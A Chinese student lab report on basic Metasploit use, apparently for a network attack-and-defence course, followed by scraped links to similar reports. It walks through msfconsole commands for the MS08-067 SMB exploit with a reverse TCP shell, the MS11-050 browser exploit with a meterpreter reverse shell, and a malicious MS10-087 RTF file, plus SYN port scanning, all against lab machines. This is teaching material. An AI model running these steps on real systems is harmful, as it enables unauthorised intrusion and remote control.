MSF的六种模块

  • 渗透攻击模块(Exploit Modules)渗透攻击是指由攻击者或渗透测试者利用一个系统、应用或服务中的==安全漏洞==,所进行的攻击行为。
  • 辅助模块(Auxiliary Modules) 能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
  • 攻击载荷(Payload Modules)原意指‘载荷’,就是被运输的东西。
  • 空字段模块(Nop Modules)是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作。
  • 编码模块(Encoders)编码:攻击载荷模块与空指令模块组装完成一个指令序列后进行。
  • 后渗透攻击模块(Post)

MS08-067漏洞攻击

  • 启用msf终端:msfconsole
  • 可以通过:search ms08_067,查找相应的漏洞
  • 找到后,会显示相应漏洞的模块,如下图所示
  • 等待时间可能会比较长
  • msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过help来查找
  • 根据上述漏洞的模块,我们可以选择相应的模块
    • use exploit/windows/smb/ms08_067_netapi
  • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
    • show payloads
  • 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷
    • 如:set payload generic/shell_reverse_tcp
  • 注意:此处的目的是获取shell,如果想用meterpreter,找到相应的payload并设置即可
  • 查看配置渗透攻击所需的配置项

    • show options
    • 通过上述操作,可以让我们知道有哪些参数需要进行配置

  • set LHOST 10.43.57    //设置攻击IP
    set RHOST 10.43.48.75 //设置靶机IP
  • 接下来可以看看有哪些合适的靶机平台
    • show targets
    • 设置相应平台的编号:set target 0
    • 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台
  • 发起渗透攻击

    • exploit
  • 获取shell如下图所示
  • 攻击失败
  • 删除靶机的相应补丁
  • 还是失败

问题思考

  • 第一次失败原因:攻击时一直提示,会话不能建立,查询后发现靶机的漏洞已经被补了
  • 第二次失败原因:这个就不清楚了,

MS11050浏览器漏洞攻击

  • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit
  • 在靶机上使用IE浏览器访问192.168.199.143:8080/hfhf
  • 攻击成功

MS10-087漏洞攻击

  • 选取module:

    • use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
  • 设置合适的payload:

    • set payload windows/exec
    • 注:此处是运行一个可执行文件
  • set FILENAME 20145234.rft   //设置生成文件rtf
    set CMD notepad.exe //绑定记事本执行
  • 发起渗透攻击

    • exploit
  • 将生成的文件从/root/.msf4/local/20145234.rft拷贝到靶机上,并把格式修改为.doc
  • 双击运行,结果被成功绑定到记事本程序

辅助模块

  • 进入msfconsle后,通过下面相关指令查找辅助模块

    • show auxiliary
    • ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;
      ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举
      syn:使用发送TCP SYN标志的方式探测开放的端口
      tcp:通过一次完整的TCP链接来判断端口是否开放
      xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤
  • 选取相应的moudle,在这里选择如下:
    • use auxiliary/scanner/portscan/syn
  • 设置好相应参数,可以通过show options来查看

    set RHOSTS 192.168.199.139   //设置扫描目标IP地址
    set THREADS 50 //设置线程数
  • 启动:run,扫描结果如下:
  • 此时,我们也可以在msf下用nmap的相关指令,对目标主机进行扫描:
    • 通过观察不难发现,扫描速度更快,并且对每种端口的作用也有了个说明,能弄清楚每个端口是干嘛的

  • aux模块虽然不像exploit那样直接对靶机进行攻击,但它是排头兵,是对成功实现攻击的很好保障,比如在CTF竞赛中,我们为了查看靶机的web服务,首先就要对开放端口进行扫描,确认哪个端口是挂了web的,然后才有后面的后台扫描、拖库、旁注、提权等操作
  • 所以辅助模块在整个六大模块中的地位也是举足轻重的

20145234黄斐《网络对抗技术》实验五,MSF基础应用的更多相关文章

  1. 20155201 网络攻防技术 实验五 MSF基础应用

    20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...

  2. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  3. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  4. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  5. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  6. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  7. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  9. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  10. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

随机推荐

  1. 015.4守护线程和join

    内容:守护线程.join方法#####################守护线程通过开启线程之前调用setDaemon()方法,变成后台线程,前台线程运行完,后台线程自动会结束#########例子 c ...

  2. iOS js 使用与JSContext

    JSContext:js执行环境,包含了js执行时所需要的所有函数和对象: js执行时,会在执行环境搜索需要的函数然后执行,或者保存传入的变量或函数: JSContext *jsContext = [ ...

  3. BZOJ1880:[SDOI2009]Elaxia的路线(最短路,拓扑排序)

    Description 最近,Elaxia和w**的关系特别好,他们很想整天在一起,但是大学的学习太紧张了,他们 必须合理地安排两个人在一起的时间.Elaxia和w**每天都要奔波于宿舍和实验室之间, ...

  4. [Python 模块] logging模块、Logger类

    logging模块: 标准库里面的logging模块,在前面学习线程安全时曾用来解决print被打断的问题,这里会介绍logging模块的功能. logging模块是线程安全的,不需要客户做任何特殊的 ...

  5. Jmeter服务器监控插件使用

    Jmeter服务器监控插件使用 Jmeter-Plugins支持CPU.Memory.Swap.Disk和Network的监控,在测试过程中更加方便进行结果收集和统计分析. 一.准备工作: 1.下载J ...

  6. DPDK运行出现EAL Error reading from file descriptor 23 Input output error

    原因 dpdk不支持该网卡导致,需要修改一行代码,跳过dpdk pci 检查. 解决方法 修改lib/librte_eal/linuxapp/igb_uio/igb_uio.c 将文件中该行修改 pc ...

  7. 奇妙的CSS3—导航栏下划线跟随效果

    先来看一下效果: 1.基本效果就是这样的 ,鼠标悬停,下划线划入.鼠标离开,下划线划出 2.下划线的划入是有方向的,从左侧划入悬停,下划线由左向右伸长.从右侧划入,下划线由又往左伸长 实现思路 1.导 ...

  8. centos6.4 安装code::blocks

    今天下午闲着没事尝试在自己的PC中的CentOS上装一个Code::Blocks,因为是Linux菜鸟折腾了一下午才基本算搞定但依然有疑惑: 在网上各种谷哥度娘最后才发现还是官方的文档最靠谱:看这里. ...

  9. Java byte数据转换和处理总结

    一.byte和int相互转换的方法 java程序或Android程序的socket数据传输,都是通过byte数组,但是int类型是4个byte组成的,如何把一个整形int转换成byte数组,同时如何把 ...

  10. 网页静态化解决方案-Freemarker

    1.1    技术简介与使用 1.1.1     简介 为什么使用: 1.  减轻数据库的访问压力,静态化比较适合大规模且相对变化不太频繁的数据: 2.  有利于SEO(搜索引擎优化); 纯的HTML ...